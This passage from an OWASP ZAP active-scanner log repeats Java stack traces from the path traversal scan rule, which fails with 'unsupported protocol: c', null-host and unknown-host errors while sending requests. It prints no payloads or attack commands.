org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4036556 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrules.TestPathTraversal - Error occurred while scanning a message: java.lang.IllegalStateException: unsupported protocol: 'c' at org.apache.commons.httpclient.protocol.Protocol.lazyRegisterProtocol(Protocol.java:149) at org.apache.commons.httpclient.protocol.Protocol.getProtocol(Protocol.java:117) at org.apache.commons.httpclient.HttpHost.(HttpHost.java:107) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.sendAndCheckPayload(TestPathTraversal.java:444) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.scan(TestPathTraversal.java:285) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4036556 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrules.TestPathTraversal - Error occurred while scanning a message: java.lang.IllegalStateException: unsupported protocol: 'c' at org.apache.commons.httpclient.protocol.Protocol.lazyRegisterProtocol(Protocol.java:149) at org.apache.commons.httpclient.protocol.Protocol.getProtocol(Protocol.java:117) at org.apache.commons.httpclient.HttpHost.(HttpHost.java:107) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.sendAndCheckPayload(TestPathTraversal.java:444) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.scan(TestPathTraversal.java:285) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4036756 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrules.TestPathTraversal - Error occurred while scanning a message: java.lang.IllegalStateException: unsupported protocol: 'c' at org.apache.commons.httpclient.protocol.Protocol.lazyRegisterProtocol(Protocol.java:149) at org.apache.commons.httpclient.protocol.Protocol.getProtocol(Protocol.java:117) at org.apache.commons.httpclient.HttpHost.(HttpHost.java:107) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.sendAndCheckPayload(TestPathTraversal.java:444) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.scan(TestPathTraversal.java:285) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4036961 [ZAP-ActiveScanner-0] ERROR org.parosproxy.paros.network.HttpMethodHelper - unsupported protocol: 'c' java.lang.IllegalStateException: unsupported protocol: 'c' at org.apache.commons.httpclient.protocol.Protocol.lazyRegisterProtocol(Protocol.java:149) at org.apache.commons.httpclient.protocol.Protocol.getProtocol(Protocol.java:117) at org.apache.commons.httpclient.HttpHost.(HttpHost.java:107) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) at org.parosproxy.paros.network.HttpMethodHelper.createRequestMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.sendAndCheckPayload(TestPathTraversal.java:444) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.scan(TestPathTraversal.java:285) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4036961 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrules.TestPathTraversal - Error occurred while scanning a message: java.lang.IllegalArgumentException: host parameter is null at org.apache.commons.httpclient.HttpConnection.(HttpConnection.java:206) at org.apache.commons.httpclient.HttpConnection.(HttpConnection.java:155) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionWithReference.(MultiThreadedHttpConnectionManager.java:1145) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$ConnectionPool.createConnection(MultiThreadedHttpConnectionManager.java:762) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager.doGetConnection(MultiThreadedHttpConnectionManager.java:476) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager.getConnectionWithTimeout(MultiThreadedHttpConnectionManager.java:416) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.sendAndCheckPayload(TestPathTraversal.java:444) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.scan(TestPathTraversal.java:285) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4037162 [ZAP-ActiveScanner-1] ERROR org.parosproxy.paros.network.HttpMethodHelper - unsupported protocol: 'c' java.lang.IllegalStateException: unsupported protocol: 'c' at org.apache.commons.httpclient.protocol.Protocol.lazyRegisterProtocol(Protocol.java:149) at org.apache.commons.httpclient.protocol.Protocol.getProtocol(Protocol.java:117) at org.apache.commons.httpclient.HttpHost.(HttpHost.java:107) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) at org.parosproxy.paros.network.HttpMethodHelper.createRequestMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.sendAndCheckPayload(TestPathTraversal.java:444) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.scan(TestPathTraversal.java:285) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4037162 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrules.TestPathTraversal - Error occurred while scanning a message: java.lang.IllegalArgumentException: host parameter is null at org.apache.commons.httpclient.HttpConnection.(HttpConnection.java:206) at org.apache.commons.httpclient.HttpConnection.(HttpConnection.java:155) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionWithReference.(MultiThreadedHttpConnectionManager.java:1145) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$ConnectionPool.createConnection(MultiThreadedHttpConnectionManager.java:762) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager.doGetConnection(MultiThreadedHttpConnectionManager.java:476) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager.getConnectionWithTimeout(MultiThreadedHttpConnectionManager.java:416) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.sendAndCheckPayload(TestPathTraversal.java:444) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.scan(TestPathTraversal.java:285) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4037162 [ZAP-ActiveScanner-0] ERROR org.parosproxy.paros.network.HttpMethodHelper - unsupported protocol: 'c' java.lang.IllegalStateException: unsupported protocol: 'c' at org.apache.commons.httpclient.protocol.Protocol.lazyRegisterProtocol(Protocol.java:149) at org.apache.commons.httpclient.protocol.Protocol.getProtocol(Protocol.java:117) at org.apache.commons.httpclient.HttpHost.(HttpHost.java:107) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) at org.parosproxy.paros.network.HttpMethodHelper.createRequestMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.sendAndCheckPayload(TestPathTraversal.java:444) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.scan(TestPathTraversal.java:285) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4037163 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrules.TestPathTraversal - Error occurred while scanning a message: java.lang.IllegalArgumentException: host parameter is null at org.apache.commons.httpclient.HttpConnection.(HttpConnection.java:206) at org.apache.commons.httpclient.HttpConnection.(HttpConnection.java:155) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionWithReference.(MultiThreadedHttpConnectionManager.java:1145) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$ConnectionPool.createConnection(MultiThreadedHttpConnectionManager.java:762) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager.doGetConnection(MultiThreadedHttpConnectionManager.java:476) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager.getConnectionWithTimeout(MultiThreadedHttpConnectionManager.java:416) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.sendAndCheckPayload(TestPathTraversal.java:444) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.scan(TestPathTraversal.java:285) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4037364 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.ascanrules.TestPathTraversal - Error scanning parameters for Path Traversal: c java.net.UnknownHostException: c at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.sendAndCheckPayload(TestPathTraversal.java:444) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.scan(TestPathTraversal.java:285) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4037364 [ZAP-ActiveScanner-1] ERROR org.parosproxy.paros.network.HttpMethodHelper - unsupported protocol: 'c' java.lang.IllegalStateException: unsupported protocol: 'c' at org.apache.commons.httpclient.protocol.Protocol.lazyRegisterProtocol(Protocol.java:149) at org.apache.commons.httpclient.protocol.Protocol.getProtocol(Protocol.java:117) at org.apache.commons.httpclient.HttpHost.(HttpHost.java:107) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) at org.parosproxy.paros.network.HttpMethodHelper.createRequestMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.sendAndCheckPayload(TestPathTraversal.java:444) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.scan(TestPathTraversal.java:285) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4037365 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrules.TestPathTraversal - Error occurred while scanning a message: java.lang.IllegalArgumentException: host parameter is null at org.apache.commons.httpclient.HttpConnection.(HttpConnection.java:206) at org.apache.commons.httpclient.HttpConnection.(HttpConnection.java:155) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionWithReference.(MultiThreadedHttpConnectionManager.java:1145) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$ConnectionPool.createConnection(MultiThreadedHttpConnectionManager.java:762) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager.doGetConnection(MultiThreadedHttpConnectionManager.java:476) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager.getConnectionWithTimeout(MultiThreadedHttpConnectionManager.java:416) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.sendAndCheckPayload(TestPathTraversal.java:444) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.scan(TestPathTraversal.java:285) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4037564 [ZAP-ActiveScanner-0] ERROR org.parosproxy.paros.network.HttpMethodHelper - unsupported protocol: 'c' java.lang.IllegalStateException: unsupported protocol: 'c' at org.apache.commons.httpclient.protocol.Protocol.lazyRegisterProtocol(Protocol.java:149) at org.apache.commons.httpclient.protocol.Protocol.getProtocol(Protocol.java:117) at org.apache.commons.httpclient.HttpHost.(HttpHost.java:107) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) at org.parosproxy.paros.network.HttpMethodHelper.createRequestMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.sendAndCheckPayload(TestPathTraversal.java:444) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.scan(TestPathTraversal.java:285) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4037565 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrules.TestPathTraversal - Error occurred while scanning a message: java.lang.IllegalArgumentException: host parameter is null at org.apache.commons.httpclient.HttpConnection.(HttpConnection.java:206) at org.apache.commons.httpclient.HttpConnection.(HttpConnection.java:155) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionWithReference.(MultiThreadedHttpConnectionManager.java:1145) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$ConnectionPool.createConnection(MultiThreadedHttpConnectionManager.java:762) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager.doGetConnection(MultiThreadedHttpConnectionManager.java:476) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager.getConnectionWithTimeout(MultiThreadedHttpConnectionManager.java:416) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.sendAndCheckPayload(TestPathTraversal.java:444) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.scan(TestPathTraversal.java:285) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4037564 [ZAP-ActiveScanner-1] ERROR org.parosproxy.paros.network.HttpMethodHelper - unsupported protocol: 'c' java.lang.IllegalStateException: unsupported protocol: 'c' at org.apache.commons.httpclient.protocol.Protocol.lazyRegisterProtocol(Protocol.java:149) at org.apache.commons.httpclient.protocol.Protocol.getProtocol(Protocol.java:117) at org.apache.commons.httpclient.HttpHost.(HttpHost.java:107) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) at org.parosproxy.paros.network.HttpMethodHelper.createRequestMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.sendAndCheckPayload(TestPathTraversal.java:444) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.scan(TestPathTraversal.java:285) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4037565 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrules.TestPathTraversal - Error occurred while scanning a message: java.lang.IllegalArgumentException: host parameter is null at org.apache.commons.httpclient.HttpConnection.(HttpConnection.java:206) at org.apache.commons.httpclient.HttpConnection.(HttpConnection.java:155) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionWithReference.(MultiThreadedHttpConnectionManager.java:1145) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$ConnectionPool.createConnection(MultiThreadedHttpConnectionManager.java:762) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager.doGetConnection(MultiThreadedHttpConnectionManager.java:476) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager.getConnectionWithTimeout(MultiThreadedHttpConnectionManager.java:416) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestPathTraversal.sendAndCheckPayload(TestPathTraversal.java:444) at 